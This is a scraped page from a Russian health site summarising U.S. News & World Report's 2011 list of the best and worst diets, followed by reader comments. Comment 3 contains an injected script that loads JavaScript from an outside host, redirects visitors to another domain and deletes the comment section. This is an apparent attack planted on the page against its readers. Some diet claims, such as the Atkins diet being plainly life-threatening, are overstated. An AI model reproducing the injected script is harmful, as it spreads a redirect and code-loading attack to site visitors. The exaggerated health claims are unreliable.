Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лучшие диеты 2011 года  >>  Лучшие диеты 2011 года
 
Обратная связь
 

Лучшие диеты 2011 года

Размер шрифта
08 ноября 2011 07:00
  • google_analytics: false
  • Нравится

Эксперты новостного еженедельного журнала U.S. News & World Report составили список лучших и худших диет 2011 года.

1

В составе экспертного совета издания 22 специалиста из различных областей медицины. Это лучшие американские диетологи, кардиологи и эндокринологи. Каждый год эксперты составляют список диет и оценивают их по семи категориям: краткосрочная потеря веса, долгосрочная потеря веса, легкость диеты, продуктовый состав, безопасность диеты, способность предотвращать диабет и сердечно-сосудистые заболевания. Рейтинг составляется с одной единственной целью: чтобы «худеющие теряли вес, а не свое здоровье».

В 2011 году экспертный совет отобрал 20 диет и оценил их по шкале от 1 до 5. «Здоровье инфо» публикует 10 лучших диет 2011 года с краткими описаниями, а также 3 самые худшие диеты.

Первые места были отданы диетам, разработанным государственными институтами для лечения заболеваний сердечно-сосудистой системы. А худшими диетами были признаны «странные диеты» (англ. – fad diets), основанные на существенном перекосе пищевой пирамиды.

10 лучших диет 2011 года


  1. DASH (Диетологический подход к лечению гипертонии).

Диета разработана Министерством здравоохранения и социальных услуг США для снижения артериального давления у больных гипертонией. Это комплексная диета с большим содержанием фруктов, овощей, цельных зерен и нежирных молочных продуктов. При этой диете DASH надо ограничить насыщенные жиры, сладости, красное мясо и сильно сократить употребление соли – не более 2400 мг в день (чайная ложка). Количество приемов пищи и размер порций рассчитывается из ваших энергетических нужд.


  1. TLC (Терапевтические изменения образа жизни)

Диета была разработана Национальным институтом здравоохранения США. Она помогает снизить уровень холестерина в крови и уменьшить риск развития сердечно-сосудистых заболеваний. Основное требование для всех людей – потреблять не более 200 мг холестерина и 2400 мг соли в день. 7% калорий надо получать из насыщенных жиров, 25-35% калорий – из жиров вообще. Чтобы ускорить снижение уровня холестерина, диетолог может назначить дополнительный прием клетчатки.


  1. Средиземноморская диета

Одна из самых популярных в мире диет. Это простая диета без лишних расчетов и доступная для всех. В нее входит цельное зерно, свежие фрукты и овощи, рыба, оливковое масло и орехи. Все эти продукты полезны для сердечно-сосудистой системы.


  1. Диета клиники Майо

Эта диета не ограничивает калорийность блюд, а дефицит энергии создается за счет физических упражнений, также разработанных экспертами клиники. Оригинальная диета Майо появилась на официальном сайте клиники только в 2010 году. Она абсолютно бесплатна, как и советы Елены Малышевой, которые публикуются на нашем сайте.

1


  1. Volumetrics Diet («Объемная диета»)

Разработчик диеты Барбара Роллс говорит, что людей нельзя ограничивать в еде, так как они любят есть. Она предлагает потреблять объемные продукты, которые содержат много воды и мало калорий – фрукты, овощные супы, нежирные молочные продукты. Впрочем, у экспертов есть большие сомнения, ведь жидкие продукты насыщают хуже.


  1. Weight Watchers («Наблюдающие за весом»)

Компания была основана в 1963 году домохозяйкой из Бруклина. Сейчас это крупная организация с филиалами в 30 странах, которая распространяет товары для похудения. Каждый продукт или блюдо оценивается по балльной системе, которая была отменена компанией относительно недавно из-за неудобства использования. В остальном это обычная диета с большим количеством цельных зерен, нежирных молочных продуктов и белка.


  1. Диета Дженни Крейг

Плюс диеты Дженни Крейг в том, что ее эффективность была клинически доказана. Минус один – это чисто коммерческая диета, и надо заказывать готовые блюда. Основной же принцип диеты таков: употреблять продукты, богатые кальцием и клетчаткой, с точным расчетом БЖУ.


  1. Диета Орниша

Дин Орниш известен в профессиональной среде кардиологов как автор диеты для лечения ишемической болезни сердца без хирургических вмешательств и лекарств. Диета Орниша – это мягкая вегетарианская диета, которая не только оздоровит сердце и сосуды, но и поможет сбросить немного веса. Орниш предлагает без ограничения есть зерновые, овощи, фрукты и бобовые, избегать мяса, масла, сахара, алкоголя, орехов, оливок, авокадо. При этом 10% калорий вы должны получать из жиров.


  1. Вегетарианская диета

Эксперты признали здоровой не саму вегетарианскую диету, а ее адаптированный план, разработанный Министерством сельского хозяйства США. Экстремальные разновидности вегетарианства – веганство и фрукторианство – вызывают обоснованные опасения у диетологов.


  1. Nutrisystem Diet

Еще одна компания, занимающаяся товарами для похудения. Ранее рекламировалась через «магазины на диване». На данный момент напрямую рассылает клиентам готовые блюда и биологически активные добавки. Диета компании считается безопасной и питательной, однако страдает от недостатка калия, витамина B12 и витамина D. Для россиян эта диета доступна только через Интернет.

3 худших диеты 2011 года

1

  1. Палео диета (палеолитическая диета)

Смысл палеолитической диеты – в создании плана питания, который максимально приближен к рациону пещерных людей. Наши предки занимались охотой и собирательством, а сельское хозяйство – земледелие и животноводство – пришло гораздо позже. Поэтому палео-диета полностью исключает базовые молочные и зерновые продукты. Есть можно лишь то, что древний человек мог найти в лесу.


  1. Сыроедческая диета

Одна из разновидностей веганской диеты. Сторонники сыроедения питаются только термически необработанными продуктами, исключают мясо, которое в сыром виде опасно. В этой диете мало калорий, кальция, витамина B12 и витамина D. За эти недостатки специалисты назвали ее самой худшей диетой. Кроме того, сыроедение опасно из-за высокого риска отравления термически необработанной пищей.


  1. Диета Аткинса

Диета кардиолога Роберта Аткинса заняла последнее место в рейтинге. В России эта диета в измененном виде известна как «кремлевская диета». «Слишком много жира, слишком мало углеводов», – говорят эксперты журнала. В 2010 году ученые установили, что низкоуглеводные диеты с большим количеством белков и жиров животного происхождения приводят к ранней смерти. Поэтому диета Аткинса просто опасна для здоровья и жизни.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

04 ноября 2012 в 18:31

Цитировать   |   Пожаловаться

Согласна, сыроедение не всем подходит, НО ЧТО ЗА БРЕД вы пишите об отравлении термически необработанной пищей?

Гость 04 ноября 2012 в 18:31
об отравлении термически необработанной пищей?
 Термически необработанная пища крайне опасна заражением гельминтами. Допустима только после уверенного санитарного контроля. 

3 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы о снижении веса   Почему мужчины худеют быстрее женщин   Как есть, что угодно, и не переживать?   Ученые говорят: откажитесь от лишнего веса, но не от картошки!  
26 декабря 2012Еда для снижения веса 07 августа 2012В Америке зарегистрирован новый препарат для снижения веса!
 
26 июля 2011Диеты помогают только молодым 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 

Слайдшоу

1
13 лучших правил для похудения
Супереда, сжигающая жир
Перекусы: меньше 100 ккал в порции. Часть 1

Тесты

1
Правильно ли вы худеете?
Есть ли у вас остеопороз?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.